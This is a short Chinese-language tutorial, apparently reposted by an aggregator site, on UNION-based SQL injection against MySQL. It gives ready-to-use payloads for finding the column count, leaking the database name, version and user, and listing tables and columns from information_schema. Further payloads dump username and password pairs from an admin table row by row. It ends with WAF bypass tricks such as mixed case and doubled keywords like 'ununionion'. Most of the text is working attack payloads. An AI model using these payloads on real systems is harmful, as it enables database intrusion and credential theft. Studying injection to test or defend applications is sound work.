sql注入之mysql的联合查询爆破
内容导读
互联网集市收集整理的这篇技术教程文章主要介绍了sql注入之mysql的联合查询爆破,小编现在分享给大家,供广大互联网技能从业者学习和参考。文章包含1462字,纯文字阅读大概需要3分钟。
内容图文
)的结构以查询test数据库为例:
1.判断列数
union select 1,2,3,.......... 直到页面返回正常为止
2.判断当前数据库
union select database(),2,3,4,5 1的位置将会返回数据库的名字
数据库名 database()
数据库版本 version()
数据库用户 user()
操作系统 @@version_compile_os
3.查询表名
union select group_concat(table_name),2,3,4,5,6 from information_schema.tables where table_schema=‘test‘
//group_concat()使多行数据在一列显示
4.查询列名
union select group_concat(column_name),2,3,4,5,6 from information_schema.columns where table_name=‘admin‘
5.查数据 (0x20是空格的意思)
方法一:
union select group_concat(username,0x20,password),2,3,4,5 from test.admin //将所有数据在一行显示
方法二
union select concat(username,0x20,password),2,3,4,5,6 from one.admin //因为网页限制只能显示一行数据,所以显示第一行数据
union select concat(username,0x20,password),2,3,4,5,6 from one.admin where username not in (‘root‘) //把第一行的用户排除掉,第二行自动上来
union select concat(username,0x20,password),2,3,4,5,6 from one.admin where username not in (‘admin‘,‘root‘) //看第三行数据
简单绕过waf思路:
大小写绕过
ununionion 因为会过滤关键词union,所以这样写过滤后,前面un和后面的ion又拼成了一个新的union
sql注入之mysql的联合查询爆破
标签:包含 技术分享 roo sel orm color mat word 意思
本文系统来源:http://www.cnblogs.com/pojun/p/6827772.html
内容总结
以上是互联网集市为您收集整理的sql注入之mysql的联合查询爆破全部内容,希望文章能够帮你解决sql注入之mysql的联合查询爆破所遇到的程序开发问题。 如果觉得互联网集市技术教程内容还不错,欢迎将互联网集市网站推荐给程序员好友。
内容备注
版权声明:本文内容由互联网用户自发贡献,该文观点与技术仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 gblab@vip.qq.com 举报,一经查实,本站将立刻删除。
内容手机端
扫描二维码推送至手机访问。